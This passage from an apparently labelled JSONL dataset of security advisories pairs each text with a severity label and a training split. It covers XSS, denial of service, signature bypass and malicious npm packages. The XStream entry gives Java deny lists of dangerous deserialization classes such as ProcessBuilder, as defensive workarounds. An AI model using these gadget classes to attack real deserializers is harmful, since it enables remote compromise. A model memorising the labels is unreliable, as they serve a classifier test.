3.11.1.Final and before 4.5.3.Final, where it did not properly handle URL encoding when the RESTEASY003870 exception occurs. An attacker could use this flaw to launch a reflected XSS attack.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-06-15", "split": "train"} -{"id": "8b91ef7637ffc4f74488", "text": "Denial of service attack via push rule patterns in matrix-synapse\n\n### Impact\n\n\"Push rules\" can specify [conditions](https://matrix.org/docs/spec/client_server/r0.6.1#conditions) under which they will match, including `event_match`, which matches event content against a pattern including wildcards.\n\nCertain patterns can cause very poor performance in the matching engine, leading to a denial-of-service when processing moderate length events.\n\n### Patches\n\nThe issue is patched by https://github.com/matrix-org/synapse/commit/03318a766cac9f8b053db2214d9c332a977d226c.\n\n### Workarounds\n\nA potential workaround might be to prevent users from making custom push rules, by blocking such requests at a reverse-proxy.\n\n### For more information\n\nIf you have any questions or comments about this advisory, email us at security@matrix.org.", "text_raw": "Denial of service attack via push rule patterns in matrix-synapse\n\n[Severity: MEDIUM]\n\n### Impact\n\n\"Push rules\" can specify [conditions](https://matrix.org/docs/spec/client_server/r0.6.1#conditions) under which they will match, including `event_match`, which matches event content against a pattern including wildcards.\n\nCertain patterns can cause very poor performance in the matching engine, leading to a denial-of-service when processing moderate length events.\n\n### Patches\n\nThe issue is patched by https://github.com/matrix-org/synapse/commit/03318a766cac9f8b053db2214d9c332a977d226c.\n\n### Workarounds\n\nA potential workaround might be to prevent users from making custom push rules, by blocking such requests at a reverse-proxy.\n\n### For more information\n\nIf you have any questions or comments about this advisory, email us at security@matrix.org.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-05-13", "split": "train"} -{"id": "424ad6a45dea2af842e9", "text": "Improper Verification of Cryptographic Signature in fastecdsa\n\nAn issue was discovered in fastecdsa before 2.1.2. When using the NIST P-256 curve in the ECDSA implementation, the point at infinity is mishandled. This means that for an extreme value in k and s-1, the signature verification fails even if the signature is correct. This behavior is not solely a usability problem. There are some threat models where an attacker can benefit by successfully guessing users for whom signature verification will fail.", "text_raw": "Improper Verification of Cryptographic Signature in fastecdsa\n\n[Severity: HIGH]\n\nAn issue was discovered in fastecdsa before 2.1.2. When using the NIST P-256 curve in the ECDSA implementation, the point at infinity is mishandled. This means that for an extreme value in k and s-1, the signature verification fails even if the signature is correct. This behavior is not solely a usability problem. There are some threat models where an attacker can benefit by successfully guessing users for whom signature verification will fail.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-10-12", "split": "train"} -{"id": "0b3298252c1cc1eb8a39", "text": "Microsoft Internet Explorer Memory Corruption Vulnerability\n\nAffected: Microsoft Internet Explorer\n\nMicrosoft Internet Explorer contains an unspecified vulnerability that allows for memory corruption.\n\nRequired Action: Apply updates per vendor instructions.\n\nRansomware: Known\n\nCWE(s): CWE-416\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "text_raw": "Microsoft Internet Explorer Memory Corruption Vulnerability\n\nAffected: Microsoft Internet Explorer\n\nMicrosoft Internet Explorer contains an unspecified vulnerability that allows for memory corruption.\n\nRequired Action: Apply updates per vendor instructions.\n\nRansomware: Known\n\nCWE(s): CWE-416\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "severity": "critical", "severity_label": 3, "source": "cisa_kev", "timestamp": "2021-11-03", "split": "train"} -{"id": "7b9b8f3efa5659966cad", "text": "Malicious Package in singale\n\nAll versions of this package contained malware. The package was designed to find and exfiltrate cryptocurrency wallets.\n\n## Recommendation\n\nAny computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.\n\nThe package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.", "text_raw": "Malicious Package in singale\n\n[Severity: CRITICAL]\n\nAll versions of this package contained malware. The package was designed to find and exfiltrate cryptocurrency wallets.\n\n\n## Recommendation\n\nAny computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.\n\nThe package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2020-09-03", "split": "train"} -{"id": "225e9dfaf4318d6555e6", "text": "Confused Deputy in Kubernetes\n\nA security issue was discovered with Kubernetes that could enable users to send network traffic to locations they would otherwise not have access to via a confused deputy attack.", "text_raw": "Confused Deputy in Kubernetes\n\n[Severity: LOW]\n\nA security issue was discovered with Kubernetes that could enable users to send network traffic to locations they would otherwise not have access to via a confused deputy attack.", "severity": "low", "severity_label": 0, "source": "github_advisory", "timestamp": "2021-09-21", "split": "train"} -{"id": "f701a529fe90b8381ac2", "text": "modern-async's `forEachSeries` and `forEachLimit` functions do not limit the number of requests\n\n### Impact\n\nThis is a bug affecting two of the functions in this library: `forEachSeries` and `forEachLimit`. They should limit the concurrency of some actions but, in practice, they don't. Any code calling these functions will be written thinking they would limit the concurrency but they won't. This could lead to potential security issues in other projects.\n\n### Patches\n\nThe problem has been patched in 1.0.4.\n\n### Workarounds\n\nThere is no workaround aside from upgrading to 1.0.4.", "text_raw": "modern-async's `forEachSeries` and `forEachLimit` functions do not limit the number of requests\n\n[Severity: HIGH]\n\n### Impact\n\nThis is a bug affecting two of the functions in this library: `forEachSeries` and `forEachLimit`. They should limit the concurrency of some actions but, in practice, they don't. Any code calling these functions will be written thinking they would limit the concurrency but they won't. This could lead to potential security issues in other projects.\n\n### Patches\n\nThe problem has been patched in 1.0.4.\n\n### Workarounds\n\nThere is no workaround aside from upgrading to 1.0.4.\n", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-10-21", "split": "train"} -{"id": "3042c015097e48a0b67c", "text": "github.com/u-root/u-root/pkg/tarutil Arbitrary File Write via Archive Extraction (Zip Slip)\n\nThis affects all versions up to and including version 0.7.0 of package github.com/u-root/u-root/pkg/tarutil. It is vulnerable to both leading and non-leading relative path traversal attacks in tar file extraction.", "text_raw": "github.com/u-root/u-root/pkg/tarutil Arbitrary File Write via Archive Extraction (Zip Slip)\n\n[Severity: HIGH]\n\nThis affects all versions up to and including version 0.7.0 of package github.com/u-root/u-root/pkg/tarutil. It is vulnerable to both leading and non-leading relative path traversal attacks in tar file extraction.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-05-18", "split": "train"} -{"id": "955e3785e69fe34df9d6", "text": "Auth bypass in SAML provider\n\n### Impact\n\nThe following vulnerabilities have been disclosed, which impact users leveraging the SAML auth provider:\n\n- [`goxmldsig` - Signature Validation Bypass](https://github.com/russellhaering/goxmldsig/security/advisories/GHSA-q547-gmf8-8jr7)\n- [`gosaml2` - Authentication Bypass](https://github.com/russellhaering/gosaml2/security/advisories/GHSA-xhqq-x44f-9fgg)\n\n### Patches\n\n[Patch available](https://github.com/netlify/gotrue/pull/274)\n\nPlease upgrade to v1.0.0 or commit hash `a2b4dd6bc4ef7562d1df044098b303f564eefa90`\n\n### Workarounds\n\nNo known workarounds.\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [gotrue](https://github.com/netlify/gotrue/issues)\n* Email us at [security@netlify.com](mailto:security@netlify.com)", "text_raw": "Auth bypass in SAML provider\n\n[Severity: CRITICAL]\n\n### Impact\n\nThe following vulnerabilities have been disclosed, which impact users leveraging the SAML auth provider:\n\n- [`goxmldsig` - Signature Validation Bypass](https://github.com/russellhaering/goxmldsig/security/advisories/GHSA-q547-gmf8-8jr7)\n- [`gosaml2` - Authentication Bypass](https://github.com/russellhaering/gosaml2/security/advisories/GHSA-xhqq-x44f-9fgg)\n\n### Patches\n\n[Patch available](https://github.com/netlify/gotrue/pull/274)\n\nPlease upgrade to v1.0.0 or commit hash `a2b4dd6bc4ef7562d1df044098b303f564eefa90`\n\n### Workarounds\n\nNo known workarounds.\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [gotrue](https://github.com/netlify/gotrue/issues)\n* Email us at [security@netlify.com](mailto:security@netlify.com)", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2021-06-23", "split": "train"} -{"id": "635c46f120ddd45f9ff0", "text": "TECO JN5 L510-DriveLink 1.482 SEH Overwrite Buffer Overflow Exploit", "text_raw": "TECO JN5 L510-DriveLink 1.482 SEH Overwrite Buffer Overflow Exploit\n\nSeverity: high", "severity": "high", "severity_label": 2, "source": "zeroscience", "timestamp": "2015-11-15", "split": "train"} -{"id": "cead12a05064baa89847", "text": "Mozilla Firefox And Thunderbird Use-After-Free Vulnerability\n\nAffected: Mozilla Firefox and Thunderbird\n\nMozilla Firefox and Thunderbird contain a race condition vulnerability when handling a ReadableStream under certain conditions. The race condition creates a use-after-free vulnerability, causing unspecified impacts.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-362\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "text_raw": "Mozilla Firefox And Thunderbird Use-After-Free Vulnerability\n\nAffected: Mozilla Firefox and Thunderbird\n\nMozilla Firefox and Thunderbird contain a race condition vulnerability when handling a ReadableStream under certain conditions. The race condition creates a use-after-free vulnerability, causing unspecified impacts.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-362\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "severity": "critical", "severity_label": 3, "source": "cisa_kev", "timestamp": "2021-11-03", "split": "train"} -{"id": "d41768a248420ed90f3e", "text": "Cayin Digital Signage System xPost 2.5 Pre-Auth SQLi Remote Code Execution", "text_raw": "Cayin Digital Signage System xPost 2.5 Pre-Auth SQLi Remote Code Execution\n\nSeverity: critical", "severity": "critical", "severity_label": 3, "source": "zeroscience", "timestamp": "2020-06-04", "split": "train"} -{"id": "7f29e4b7168428b3e651", "text": "Ajaxel CMS 8.0 Multiple Vulnerabilities", "text_raw": "Ajaxel CMS 8.0 Multiple Vulnerabilities\n\nSeverity: high", "severity": "high", "severity_label": 2, "source": "zeroscience", "timestamp": "2016-05-06", "split": "train"} -{"id": "dfe5e6c76f3f1f7787e3", "text": "Malicious Package in js-sja3\n\nVersion 0.8.0 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user.\n\n## Recommendation\n\nRemove the package from your environment. Ensure no Ethereum funds were compromised.", "text_raw": "Malicious Package in js-sja3\n\n[Severity: CRITICAL]\n\nVersion 0.8.0 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user.\n\n\n## Recommendation\n\nRemove the package from your environment. Ensure no Ethereum funds were compromised.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2020-09-03", "split": "train"} -{"id": "849ba4fc5fdccb9dd1f7", "text": "Arm Mali Graphics Processing Unit (GPU) Use-After-Free Vulnerability\n\nAffected: Arm Mali Graphics Processing Unit (GPU)\n\nArm Mali Graphics Processing Unit (GPU) kernel driver contains a use-after-free vulnerability that may allow a non-privileged user to make improper operations on GPU memory to gain root privilege, and/or disclose information.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-416\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "text_raw": "Arm Mali Graphics Processing Unit (GPU) Use-After-Free Vulnerability\n\nAffected: Arm Mali Graphics Processing Unit (GPU)\n\nArm Mali Graphics Processing Unit (GPU) kernel driver contains a use-after-free vulnerability that may allow a non-privileged user to make improper operations on GPU memory to gain root privilege, and/or disclose information.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-416\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "severity": "critical", "severity_label": 3, "source": "cisa_kev", "timestamp": "2021-11-03", "split": "train"} -{"id": "7cb485627a49eb017851", "text": "Cross-site scripting in Products.CMFCore, Products.PluggableAuthService, Plone\n\nZope Products.CMFCore before 2.5.1 and Products.PluggableAuthService before 2.6.2, as used in Plone through 5.2.4 and other products, allow Reflected XSS.", "text_raw": "Cross-site scripting in Products.CMFCore, Products.PluggableAuthService, Plone\n\n[Severity: MEDIUM]\n\nZope Products.CMFCore before 2.5.1 and Products.PluggableAuthService before 2.6.2, as used in Plone through 5.2.4 and other products, allow Reflected XSS.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-06-18", "split": "train"} -{"id": "2e594ca9e3b2b8294a05", "text": "Plone and Zope2 vulnerable to unauthorized access to restricted attributes\n\nThe App.Undo.UndoSupport.get_request_var_or_attr function in Zope before 2.12.21 and 3.13.x before 2.13.11, as used in Plone before 4.2.3 and 4.3 before beta 1, allows remote authenticated users to gain access to restricted attributes via unspecified vectors.", "text_raw": "Plone and Zope2 vulnerable to unauthorized access to restricted attributes\n\n[Severity: HIGH]\n\nThe App.Undo.UndoSupport.get_request_var_or_attr function in Zope before 2.12.21 and 3.13.x before 2.13.11, as used in Plone before 4.2.3 and 4.3 before beta 1, allows remote authenticated users to gain access to restricted attributes via unspecified vectors.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2018-07-23", "split": "train"} -{"id": "8c30242a802579d05481", "text": "Dangling reference in flatbuffers\n\nAn issue was discovered in the flatbuffers crate through 2020-04-11 for Rust. read_scalar (and read_scalar_at) can transmute values without unsafe blocks.", "text_raw": "Dangling reference in flatbuffers\n\n[Severity: HIGH]\n\nAn issue was discovered in the flatbuffers crate through 2020-04-11 for Rust. read_scalar (and read_scalar_at) can transmute values without unsafe blocks.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-08-25", "split": "train"} -{"id": "ce34f17a0ebbea79139c", "text": "Discovery uses the same AES/GCM Nonce throughout the session\n\nDiscovery uses the same AES/GCM Nonce throughout the session though it should be generated on per message basis which can lead to the leaking of the session key. As the actual ENR record is signed with a different key it is not possible for an attacker to alter the ENR record. Note that the node private key is not compromised, only the session key generated to communicate with an individual peer.\n\nFrom [discovery spec](https://github.com/ethereum/devp2p/blob/f97b8a5b8e9589d3355ebbd9d4a58d5d1644bdf7/discv5/discv5-theory.md#session-cache):\n> The number of messages which can be encrypted with a certain session key is limited because encryption of each message requires a unique nonce for AES-GCM. In addition to the keys, the session cache must also keep track of the count of outgoing messages to ensure the uniqueness of nonce values. Since the wire protocol uses 96 bit AES-GCM nonces, it is strongly recommended to generate them by encoding the current outgoing message count into the first 32 bits of the nonce and filling the remaining 64 bits with random data generated by a cryptographically secure random number generator.", "text_raw": "Discovery uses the same AES/GCM Nonce throughout the session\n\n[Severity: LOW]\n\nDiscovery uses the same AES/GCM Nonce throughout the session though it should be generated on per message basis which can lead to the leaking of the session key. As the actual ENR record is signed with a different key it is not possible for an attacker to alter the ENR record. Note that the node private key is not compromised, only the session key generated to communicate with an individual peer.\n\nFrom [discovery spec](https://github.com/ethereum/devp2p/blob/f97b8a5b8e9589d3355ebbd9d4a58d5d1644bdf7/discv5/discv5-theory.md#session-cache):\n> The number of messages which can be encrypted with a certain session key is limited because encryption of each message requires a unique nonce for AES-GCM. In addition to the keys, the session cache must also keep track of the count of outgoing messages to ensure the uniqueness of nonce values. Since the wire protocol uses 96 bit AES-GCM nonces, it is strongly recommended to generate them by encoding the current outgoing message count into the first 32 bits of the nonce and filling the remaining 64 bits with random data generated by a cryptographically secure random number generator.", "severity": "low", "severity_label": 0, "source": "github_advisory", "timestamp": "2021-04-06", "split": "train"} -{"id": "303a90808d4437d6b44c", "text": "Authz Module Non-Determinism\n\n### Impact\n\nConsensus failure for 0.43.x and 0.44.{0,1} users. \nFunds and balances are safe.\n\n### Patches\n\n0.44.2\n\n### Workarounds\n\nManually patch the code.\n\n---\n\nFull details posted in https://forum.cosmos.network/t/cosmos-sdk-vulnerability-retrospective-security-advisory-jackfruit-october-12-2021/5349.", "text_raw": "Authz Module Non-Determinism\n\n[Severity: MEDIUM]\n\n### Impact\n\nConsensus failure for 0.43.x and 0.44.{0,1} users. \nFunds and balances are safe.\n\n### Patches\n\n0.44.2\n\n### Workarounds\n\nManually patch the code.\n\n---\n\nFull details posted in https://forum.cosmos.network/t/cosmos-sdk-vulnerability-retrospective-security-advisory-jackfruit-october-12-2021/5349.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-10-21", "split": "train"} -{"id": "13aa6e5c59c196472b49", "text": "user-readable api tokens in systemd units for JupyterHub\n\n### Impact\nuser API tokens issued to single-user servers are specified in the environment of systemd units, which are accessible to all users.\n\nIn particular, the-littlest-jupyterhub is affected, which uses systemdspawner by default.\n\n### Patches\nPatched in jupyterhub-systemdspawner v0.15\n\n### Workarounds\nNo workaround other than upgrading systemdspawner to 0.15\n\n### For more information\n\nIf you have any questions or comments about this advisory:\n* Open a thread in [the Jupyter forum](https://discourse.jupyter.org)\n* Email us at [security@ipython.org](mailto:security@ipython.org)", "text_raw": "user-readable api tokens in systemd units for JupyterHub\n\n[Severity: HIGH]\n\n### Impact\nuser API tokens issued to single-user servers are specified in the environment of systemd units, which are accessible to all users.\n\nIn particular, the-littlest-jupyterhub is affected, which uses systemdspawner by default.\n\n### Patches\nPatched in jupyterhub-systemdspawner v0.15\n\n### Workarounds\nNo workaround other than upgrading systemdspawner to 0.15\n\n### For more information\n\nIf you have any questions or comments about this advisory:\n* Open a thread in [the Jupyter forum](https://discourse.jupyter.org)\n* Email us at [security@ipython.org](mailto:security@ipython.org)", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2020-12-09", "split": "train"} -{"id": "cd248e78ad623b23df9a", "text": "XStream vulnerable to an Arbitrary File Deletion on the local host when unmarshalling\n\n### Impact\nThe vulnerability may allow a remote attacker to delete arbitrary know files on the host as log as the executing process has sufficient rights only by manipulating the processed input stream.\n\n### Patches\nIf you rely on XStream's default blacklist of the [Security Framework](https://x-stream.github.io/security.html#framework), you will have to use at least version 1.4.15.\n\n### Workarounds\nThe reported vulnerability does only exist with a JAX-WS runtime on the classpath.\n\nNo user is affected, who followed the recommendation to setup XStream's Security Framework with a whitelist! Anyone relying on XStream's default blacklist can immediately switch to a whilelist for the allowed types to avoid the vulnerability.\n\nUsers of XStream 1.4.14 or below who still insist to use XStream default blacklist - despite that clear recommendation - can use a workaround depending on their version in use.\n\nUsers of XStream 1.4.14 can simply add two lines to XStream's setup code:\n```Java\nxstream.denyTypes(new String[]{ \"jdk.nashorn.internal.objects.NativeString\" });\nxstream.denyTypesByRegExp(new String[]{ \".*\\\\.ReadAllStream\\\\$FileStream\" });\n```\n\nUsers of XStream 1.4.14 to 1.4.13 can simply add three lines to XStream's setup code:\n```Java\nxstream.denyTypes(new String[]{ \"javax.imageio.ImageIO$ContainsFilter\", \"jdk.nashorn.internal.objects.NativeString\" });\nxstream.denyTypes(new Class[]{ java.lang.ProcessBuilder.class });\nxstream.denyTypesByRegExp(new String[]{ \".*\\\\.ReadAllStream\\\\$FileStream\" });\n```\nUsers of XStream 1.4.12 to 1.4.7 who want to use XStream with a black list will have to setup such a list from scratch and deny at least the following types: _javax.imageio.ImageIO$ContainsFilter_, _java.beans.EventHandler_, _java.lang.ProcessBuilder_, _jdk.nashorn.internal.objects.NativeString.class_, _java.lang.Void_ and _void_ and deny several types by name pattern.\n```Java\nxstream.denyTypes(new String[]{ \"javax.imageio.ImageIO$ContainsFilter\", \"jdk.nashorn.internal.objects.NativeString\" });\nxstream.denyTypes(new Class[]{ java.lang.ProcessBuilder.class, \"jdk.nashorn.internal.objects.NativeString\", java.beans.EventHandler.class, java.lang.ProcessBuilder.class, java.lang.Void.class, void.class });\nxstream.denyTypesByRegExp(new String[]{ \".*\\\\$LazyIterator\", \"javax\\\\.crypto\\\\..*\", \".*\\\\.ReadAllStream\\\\$FileStream\" });\n```\nUsers of XStream 1.4.6 or below can register an own converter to prevent the unmarshalling of the currently know critical types of the Java runtime. It is in fact an updated version of the workaround for CVE-2013-7285:\n```Java\nxstream.registerConverter(new Converter() {\n public boolean canConvert(Class type) {\n return type != null && (type == java.beans.EventHandler.class || type == java.lang.ProcessBuilder.class\n || type.getName().equals(\"javax.imageio.ImageIO$ContainsFilter\") || type.getName().equals(\"jdk.nashorn.internal.objects.NativeString\")\n || type == java.lang.Void.class || void.class || Proxy.isProxy(type))\n || type.getName().startsWith(\"javax.crypto.\") || type.getName().endsWith(\"$LazyIterator\") || type.getName().endsWith(\".ReadAllStream$FileStream\"));\n }\n\npublic Object unmarshal(HierarchicalStreamReader reader, UnmarshallingContext context) {\n throw new ConversionException(\"Unsupported type due to security reasons.\");\n }\n\npublic void marshal(Object source, HierarchicalStreamWriter writer, MarshallingContext context) {\n throw new ConversionException(\"Unsupported type due to security reasons.\");\n }\n}, XStream.PRIORITY_LOW);\n```\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [XStream](https://github.com/x-stream/xstream/issues)\n* Contact us at [XStream Google Group](https://groups.google.com/group/xstream-user)", "text_raw": "XStream vulnerable to an Arbitrary File Deletion on the local host when unmarshalling\n\n[Severity: MEDIUM]\n\n### Impact\nThe vulnerability may allow a remote attacker to delete arbitrary know files on the host as log as the executing process has sufficient rights only by manipulating the processed input stream.\n\n### Patches\nIf you rely on XStream's default blacklist of the [Security Framework](https://x-stream.github.io/security.html#framework), you will have to use at least version 1.4.15.\n\n### Workarounds\nThe reported vulnerability does only exist with a JAX-WS runtime on the classpath.\n\nNo user is affected, who followed the recommendation to setup XStream's Security Framework with a whitelist! Anyone relying on XStream's default blacklist can immediately switch to a whilelist for the allowed types to avoid the vulnerability.\n\nUsers of XStream 1.4.14 or below who still insist to use XStream default blacklist - despite that clear recommendation - can use a workaround depending on their version in use.\n\nUsers of XStream 1.4.14 can simply add two lines to XStream's setup code:\n```Java\nxstream.denyTypes(new String[]{ \"jdk.nashorn.internal.objects.NativeString\" });\nxstream.denyTypesByRegExp(new String[]{ \".*\\\\.ReadAllStream\\\\$FileStream\" });\n```\n\nUsers of XStream 1.4.14 to 1.4.13 can simply add three lines to XStream's setup code:\n```Java\nxstream.denyTypes(new String[]{ \"javax.imageio.ImageIO$ContainsFilter\", \"jdk.nashorn.internal.objects.NativeString\" });\nxstream.denyTypes(new Class[]{ java.lang.ProcessBuilder.class });\nxstream.denyTypesByRegExp(new String[]{ \".*\\\\.ReadAllStream\\\\$FileStream\" });\n```\nUsers of XStream 1.4.12 to 1.4.7 who want to use XStream with a black list will have to setup such a list from scratch and deny at least the following types: _javax.imageio.ImageIO$ContainsFilter_, _java.beans.EventHandler_, _java.lang.ProcessBuilder_, _jdk.nashorn.internal.objects.NativeString.class_, _java.lang.Void_ and _void_ and deny several types by name pattern.\n```Java\nxstream.denyTypes(new String[]{ \"javax.imageio.ImageIO$ContainsFilter\", \"jdk.nashorn.internal.objects.NativeString\" });\nxstream.denyTypes(new Class[]{ java.lang.ProcessBuilder.class, \"jdk.nashorn.internal.objects.NativeString\", java.beans.EventHandler.class, java.lang.ProcessBuilder.class, java.lang.Void.class, void.class });\nxstream.denyTypesByRegExp(new String[]{ \".*\\\\$LazyIterator\", \"javax\\\\.crypto\\\\..*\", \".*\\\\.ReadAllStream\\\\$FileStream\" });\n```\nUsers of XStream 1.4.6 or below can register an own converter to prevent the unmarshalling of the currently know critical types of the Java runtime. It is in fact an updated version of the workaround for CVE-2013-7285:\n```Java\nxstream.registerConverter(new Converter() {\n public boolean canConvert(Class type) {\n return type != null && (type == java.beans.EventHandler.class || type == java.lang.ProcessBuilder.class\n || type.getName().equals(\"javax.imageio.ImageIO$ContainsFilter\") || type.getName().equals(\"jdk.nashorn.internal.objects.NativeString\")\n || type == java.lang.Void.class || void.class || Proxy.isProxy(type))\n || type.getName().startsWith(\"javax.crypto.\") || type.getName().endsWith(\"$LazyIterator\") || type.getName().endsWith(\".ReadAllStream$FileStream\"));\n }\n\n public Object unmarshal(HierarchicalStreamReader reader, UnmarshallingContext context) {\n throw new ConversionException(\"Unsupported type due to security reasons.\");\n }\n\n public void marshal(Object source, HierarchicalStreamWriter writer, MarshallingContext context) {\n throw new ConversionException(\"Unsupported type due to security reasons.\");\n }\n}, XStream.PRIORITY_LOW);\n```\n \n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [XStream](https://github.com/x-stream/xstream/issues)\n* Contact us at [XStream Google Group](https://groups.google.com/group/xstream-user)", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2020-12-21", "split": "train"} -{"id": "def4d034ac453a6cd13e", "text": "noderequest is malware\n\nThe `noderequest` package is a piece of malware that steals environment variables and sends them to attacker controlled locations.\n\nAll versions have been unpublished from the npm registry.\n\n## Recommendation\n\nAs this package is malware, if you find it installed in your environment, the real security concern is determining how it got there.\n\nIf you have found this installed in your environment, you should:\n1. Delete the package\n2. Clear your npm cache\n3. Ensure it is not present in any other package.json files on your system\n4. Regenerate your registry credentials, tokens, and any other sensitive credentials that may have been present in your environment variables.\n\nAdditionally, any service which may have been exposed via credentials in your environment variables, such as a database, should be reviewed for indicators of compromise as well.", "text_raw": "noderequest is malware\n\n[Severity: HIGH]\n\nThe `noderequest` package is a piece of malware that steals environment variables and sends them to attacker controlled locations. \n\nAll versions have been unpublished from the npm registry.\n\n\n## Recommendation\n\n\nAs this package is malware, if you find it installed in your environment, the real security concern is determining how it got there. \n\nIf you have found this installed in your environment, you should:\n1. Delete the package\n2. Clear your npm cache\n3. Ensure it is not present in any other package.json files on your system\n4. Regenerate your registry credentials, tokens, and any other sensitive credentials that may have been present in your environment variables. \n\nAdditionally, any service which may have been exposed via credentials in your environment variables, such as a database, should be reviewed for indicators of compromise as well.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2018-09-17", "split": "train"} -{"id": "1e40b83c77a4484cab73", "text": "Apple iOS WebKit Buffer Overflow Vulnerability\n\nAffected: Apple iOS\n\nApple iOS WebKit contains a buffer-overflow vulnerability that leads to code execution when processing maliciously crafted web content. This vulnerability could impact HTML parsers that use WebKit, including but not limited to Apple Safari and non-Apple products which rely on WebKit for HTML processing.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-119\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "text_raw": "Apple iOS WebKit Buffer Overflow Vulnerability\n\nAffected: Apple iOS\n\nApple iOS WebKit contains a buffer-overflow vulnerability that leads to code execution when processing maliciously crafted web content. This vulnerability could impact HTML parsers that use WebKit, including but not limited to Apple Safari and non-Apple products which rely on WebKit for HTML processing.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-119\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "severity": "critical", "severity_label": 3, "source": "cisa_kev", "timestamp": "2021-11-03", "split": "train"} -{"id": "246fff261311d8346103", "text": "ManageEngine Firewall Analyzer 8.5 SP-5.0 Multiple XSS Vulnerabilities", "text_raw": "ManageEngine Firewall Analyzer 8.5 SP-5.0 Multiple XSS Vulnerabilities\n\nSeverity: medium", "severity": "medium", "severity_label": 1, "source": "zeroscience", "timestamp": "2016-02-23", "split": "train"} -{"id": "87a40141692b59a12dec", "text": "Cross-Site Scripting in jingo\n\nVersions of `jingo` prior to 1.9.2 are vulnerable to Cross-Site Scripting (XSS). If malicious input such as `` is placed in the content of a wiki page, Jingo does not properly encode the input and it is executed instead of rendered as text.\n\n## Recommendation\n\nUpgrade to version 1.9.2", "text_raw": "Cross-Site Scripting in jingo\n\n[Severity: HIGH]\n\nVersions of `jingo` prior to 1.9.2 are vulnerable to Cross-Site Scripting (XSS). If malicious input such as `` is placed in the content of a wiki page, Jingo does not properly encode the input and it is executed instead of rendered as text.\n\n\n## Recommendation\n\nUpgrade to version 1.9.2", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2020-09-01", "split": "train"} -{"id": "3bb2387720c5a7c2888c", "text": "Microsoft Windows Privilege Common Log File System (CLFS) Escalation Vulnerability\n\nAffected: Microsoft Windows\n\nMicrosoft Windows Common Log File System (CLFS) driver improperly handles objects in memory which can allow for privilege escalation.\n\nRequired Action: Apply updates per vendor instructions.\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "text_raw": "Microsoft Windows Privilege Common Log File System (CLFS) Escalation Vulnerability\n\nAffected: Microsoft Windows\n\nMicrosoft Windows Common Log File System (CLFS) driver improperly handles objects in memory which can allow for privilege escalation.\n\nRequired Action: Apply updates per vendor instructions.\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "severity": "critical", "severity_label": 3, "source": "cisa_kev", "timestamp": "2021-11-03", "split": "train"} -{"id": "ec7f55e44c7e9c897a62", "text": "Citrix ADC, Gateway, and SD-WAN WANOP Appliance Information Disclosure Vulnerability\n\nAffected: Citrix Application Delivery Controller (ADC), Gateway, and SD-WAN WANOP Appliance\n\nCitrix ADC, Citrix Gateway, and multiple Citrix SD-WAN WANOP appliance models contain an information disclosure vulnerability.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-284\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "text_raw": "Citrix ADC, Gateway, and SD-WAN WANOP Appliance Information Disclosure Vulnerability\n\nAffected: Citrix Application Delivery Controller (ADC), Gateway, and SD-WAN WANOP Appliance\n\nCitrix ADC, Citrix Gateway, and multiple Citrix SD-WAN WANOP appliance models contain an information disclosure vulnerability.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-284\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "severity": "critical", "severity_label": 3, "source": "cisa_kev", "timestamp": "2021-11-03", "split": "train"} -{"id": "b469385e3c4e9532b7f6", "text": "Malicious Package in buffeb-xor\n\nVersion 2.0.2 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user.\n\n## Recommendation\n\nRemove the package from your environment. Ensure no Ethereum funds were compromised.", "text_raw": "Malicious Package in buffeb-xor\n\n[Severity: CRITICAL]\n\nVersion 2.0.2 contained malicious code. The package targeted the Ethereum cryptocurrency and performed 